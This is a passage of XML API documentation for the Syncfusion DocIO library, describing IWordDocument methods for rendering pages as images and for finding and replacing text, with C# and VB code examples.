            <remarks>
                <para>
                    Layouting the contents of a Word document as pages in the Essential DocIO is not exactly the same as the layouting in Microsoft Word. So, the total number of pages may vary slightly compared to that of the Microsoft Word.
                </para>
                <para>
                    This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.
                </para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document to image.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal;
                //Convert word document to image
                Image[] images = wordDocument.RenderAsImages(0, 2, ImageType.Bitmap);
                int i = 0;
                foreach (Image image in images)
                {
                    //Save the images as jpeg
                    image.Save("WordToImage_" + i + ".jpeg", ImageFormat.Jpeg);
                    i++;
                }
                //Close the document
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to image conversion
                wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Set the scaling mode for charts (Normal mode reduces the file size)
                wordDocument.ChartToImageConverter.ScalingMode = ScalingMode.Normal
                'Convert word document to image
                Dim images As Image() = wordDocument.RenderAsImages(0, 2, ImageType.Bitmap)
                Dim i As Integer = 0
                For Each image As Image In images
                    'Save the images as jpeg
                    image.Save("WordToImage_" &amp; i &amp; ".jpeg", ImageFormat.Jpeg)
                    i += 1
                Next
                'Close the document
                wordDocument.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WordDocument.ChartToImageConverter"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Find(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the text based on specified regular expression.
            </summary>
            <param name="pattern">
            The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of a particular text in the document
                TextSelection textSelection = document.Find(new Regex("panda"));
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of a particular text in the document
                Dim textSelection As TextSelection = document.Find(New Regex("panda"))
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.FindSingleLine(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the first entry of specified pattern of text in single-line mode which is extended to several paragraph in the document.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> collection that contains the found text in the document.</returns>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text extended to several paragraphs in the document
                TextSelection[] textSelections = document.FindSingleLine(new Regex("First paragraph Second paragraph"));
                WParagraph paragraph = null;
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set highlight color
                    WTextRange textRange = textSelection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.YellowGreen;
                    paragraph = textRange.OwnerParagraph;
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text extended to several paragraphs in the document
                Dim textSelections As TextSelection() = document.FindSingleLine(new Regex("First paragraph Second paragraph"))
                Dim paragraph As WParagraph = Nothing
                  For Each textSelection As TextSelection In textSelections
                      'Get the found text as single text range and set highlight color
                      Dim textRange As WTextRange = textSelection.GetAsOneRange()
                      textRange.CharacterFormat.HighlightColor = Color.YellowGreen
                      paragraph = textRange.OwnerParagraph
                  Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Find(System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds the text based on specified string, taking into the consideration of caseSensitive and wholeWord options.
            </summary>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of a particular text in the document
                TextSelection textSelection = document.Find("panda", true, true);
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of a particular text in the document
                Dim textSelection As TextSelection = document.Find("panda", true, true)
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.FindSingleLine(System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds the first entry of specified pattern of text in single-line mode which is extended to several paragraph in the document, taking into the consideration of caseSensitive and wholeWord options.
            </summary>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> collection that contains the found text in the document.</returns>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Find the first occurrence of a particular text extended to several paragraphs in the document
                TextSelection[] textSelections = document.FindSingleLine("First paragraph Second paragraph", True, False);
                WParagraph paragraph = null;
                foreach (TextSelection textSelection in textSelections)
                {
                    //Get the found text as single text range and set highlight color
                    WTextRange textRange = textSelection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.YellowGreen;
                    paragraph = textRange.OwnerParagraph;
                }
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Find the first occurrence of a particular text extended to several paragraphs in the document
                Dim textSelections As TextSelection() = document.FindSingleLine("First paragraph Second paragraph", True, False)
                Dim paragraph As WParagraph = Nothing
                  For Each textSelection As TextSelection In textSelections
                      'Get the found text as single text range and set highlight color
                      Dim textRange As WTextRange = textSelection.GetAsOneRange()
                      textRange.CharacterFormat.HighlightColor = Color.YellowGreen
                      paragraph = textRange.OwnerParagraph
                  Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.FindAll(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds and returns all entries of the specified regular expression.
            </summary>
            <param name="pattern">
            The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> collection that contains all the entries of the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to search a particular text and highlight it.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Find the occurrence of the Word "panda" in the document
                TextSelection[] textSelection = document.FindAll(new Regex("panda"));
                //Iterate through each occurrence and highlight it
                foreach (TextSelection selection in textSelection)
                {
                    IWTextRange textRange = selection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.Yellow;
                }
                //Save and Close the document
                document.Save("Result.docx");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Find the occurrence of the word "panda" in the document
                Dim textSelection As TextSelection() = document.FindAll(new Regex("panda"))
                'Iterate through each occurrence and highlight it
                For Each selection As TextSelection In textSelection
                    Dim textRange As IWTextRange = selection.GetAsOneRange()
                    textRange.CharacterFormat.HighlightColor = Color.Yellow
                Next
                document.Save("Result.docx")
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.FindAll(System.String,System.Boolean,System.Boolean)">
            <summary>
            Finds and returns all entries of the specified string, taking into the consideration of caseSensitive and wholeWord options.
            </summary>
            <param name="given">
            A string used to find the text.
            </param>
            <param name="caseSensitive">
            Set to <b>true</b> to match the similar case text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">
            Set to <b>true</b> to match the whole word text which specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>
            The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> collection that contains all the entries of the found text in the document.
            </returns>
            <example>
            <para>The following code example demonstrates how to search a particular text and highlight it.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Find the occurrence of the Word "panda" in the document
                TextSelection[] textSelection = document.FindAll("panda", false, true);
                //Iterate through each occurrence and highlight it
                foreach (TextSelection selection in textSelection)
                {
                    IWTextRange textRange = selection.GetAsOneRange();
                    textRange.CharacterFormat.HighlightColor = Color.Yellow;
                }
                //Save and Close the document
                document.Save("Result.docx");
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Find the occurrence of the word "panda" in the document
                Dim textSelection As TextSelection() = document.FindAll("panda", false, true)
                'Iterate through each occurrence and highlight it
                For Each selection As TextSelection In textSelection
                    Dim textRange As IWTextRange = selection.GetAsOneRange()
                    textRange.CharacterFormat.HighlightColor = Color.Yellow
                Next
                document.Save("Result.docx")
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of the given <see cref="T:System.Text.RegularExpressions.Regex"/> with the replace string.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Replace all occurrence of a particular text in the document
                document.Replace(new Regex("Paragraph"),"paragraph");            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Replace all occurrence of a particular text in the document
                document.Replace(New Regex("Paragraph"), "paragraph")
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with replace string, taking into
            consideration of case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Replace all occurrence of a particular text in the document
                document.Replace("Paragraph","paragraph", false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Replace all occurrence of a particular text in the document
                document.Replace("Paragraph", "paragraph", False, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace("Giant panda", selection, true, false);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace("Giant panda", selection, True, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive, whole word and formatting options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="saveFormatting">Set to <b>true </b>if to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace("Giant panda", selection, true, false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace("Giant panda", selection, True, False, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the specified regular expression with a <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> in the document.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace(new Regex("Giant panda"), selection);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace(New Regex("Giant panda"), selection)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace(new Regex("Giant panda"), selection, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the document
                document.Replace(New Regex("Giant panda"), selection, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.String,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>, taking into
            consideration case sensitive, whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="bodyPart">The text body part to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">if it specifies whole word, set to <c>true</c>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace("Giant panda", bodyPart, true, false);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace("Giant panda", bodyPart, True, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.String,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>, taking into
            consideration case sensitive, whole word and formatting options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="bodyPart">The text body part to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>..</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="saveFormatting">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace("Giant panda", bodyPart, true, false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace("Giant panda", bodyPart, True, False, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Replaces all entries of given regular expression in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/>.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="bodyPart">The text body part to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace(new Regex("Giant panda"), bodyPart);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace(New Regex("Giant panda"), bodyPart)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextBodyPart,System.Boolean)">
            <summary>
            Replaces all entries of given regular expression in the document with the 
            <see cref="T:Syncfusion.DocIO.DLS.TextBodyPart"/> along with its formatting.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="bodyPart">The text body part to replace.</param>
            <param name="saveFormating">Set to <b>true </b> to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                //Find the first occurrence of the regular expression
                TextSelection selection = document.Find(new Regex("Panda"));
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace(new Regex("Giant panda"), bodyPart, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = document.Find(New Regex("Panda"))
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace(New Regex("Giant panda"), bodyPart, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.Replace(System.String,Syncfusion.DocIO.DLS.IWordDocument,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the document with another Word document, taking into
            consideration case sensitive, whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replaceDoc">The Word document to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
